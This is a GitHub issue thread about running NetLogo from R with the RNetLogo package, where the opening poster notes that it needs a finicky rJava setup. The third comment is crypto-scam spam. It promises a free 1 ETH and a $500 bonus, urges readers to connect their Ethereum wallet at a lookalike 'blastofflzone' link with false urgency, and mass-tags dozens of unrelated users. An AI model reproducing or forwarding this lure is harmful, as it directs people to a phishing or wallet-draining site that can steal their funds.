### ISSUE TITLE
run netlogo from R

### ISSUE THREAD

**Issue by maxheld83** [Elen93/Models#2]
apparently you can also run netlogo from within R http://rnetlogo.r-forge.r-project.org/

**Comment by maxheld83** [comment]
though this requires `rJava`, and is finnicky to get to work, so probably not worth it.

**Comment by jguzej** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
ajthemacboy, @gitlongip, @RobinHung, @webdemon1, @bilxio, @shawnyhw6n9, @alinous-core, @huyongxi, @segecey, @futurepaul, @Bjorn248, @billychan, @calvinalvin, @zhuxiaoyi, @Ka1CHEN, @aydinsenturkk, @katahiromz, @SinCatGit, @khekhebla, @vomw, @paynecodes, @sarovin, @armdev, @fangasvsass, @vidann1, @d4ksn, @aalihusni, @junhaoim, @xingruiy-uob, @eGzo, @masakichi, @i-xiaov, @bZichett, @lydqc, @hariharasudhan-soundararajan, @hhyasdf, @cceation, @jacotri77, @weihanchen, @webopbro4, @haoweiguang, @professoroakz, @Raksantos, @BasilArackal, @thedrummeraki, @alanapellegrini, @guerrerocarlos, @rambo-long, @wuxingzhong, @lazylemur
